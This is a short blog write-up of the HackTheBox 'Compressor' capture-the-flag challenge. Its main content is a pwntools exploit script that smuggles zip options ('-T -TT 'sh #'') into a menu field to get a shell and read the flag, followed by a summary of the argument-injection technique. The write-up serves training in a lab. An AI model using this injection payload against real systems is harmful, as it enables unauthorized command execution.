Post

HackTheBox Compressor Challenge

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the Compressor Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/358

Description

Ramona's obsession with modifications and the addition of artifacts to her body has slowed her down and made her fail and almost get killed in many missions. For this reason, she decided to hack a tiny robot under Golden Fang's ownership called "Compressor", which can reduce and increase the volume of any object to minimize/maximize it according to the needs of the mission. With this item, she will be able to carry any spare part she needs without adding extra weight to her back, making her fast. Can you help her take it and hack it?

Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

#!/usr/bin/python3
from pwn import *
import time

def exploit(ip, port):
    p = remote(ip, int(port))
    p.sendlineafter(b'[*] Choose component: ', b'1')
    p.sendlineafter(b'[*] Choose action: ', b'1')
    p.sendlineafter(b'Insert name: ', b'htb')
    p.sendlineafter(b'Insert content: ', b'htb')
    p.sendlineafter(b'[*] Choose action: ', b'3')
    p.sendlineafter(b'Insert <name>.zip: ', b'htb')
    p.sendlineafter(b'Insert <name>: ', b'htb')
    p.sendlineafter(b'Insert <options>: ', b'-T -TT \'sh #\'')
    p.sendline(b"cat ~/flag.txt")
    p.interactive()

if __name__ == "__main__":
    import sys
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    ip, port = sys.argv[1].split(':')
    exploit(ip, port)

reference

Summary

The Compressor Challenge on Hack The Box showcases command injection vulnerabilities in Linux utilities. By exploiting the zip command with carefully crafted options (-T -TT), you can achieve arbitrary code execution. This challenge introduces beginners to leveraging insecure command execution techniques, referencing tools like GTFOBins for practical exploitation. With basic Linux terminal knowledge, you manipulate arguments to gain shell access and retrieve the flag, demonstrating real-world exploitation of misconfigured programs.

challenge
htb challenge writeup linux misc
This post is licensed under CC BY 4.0 by the author.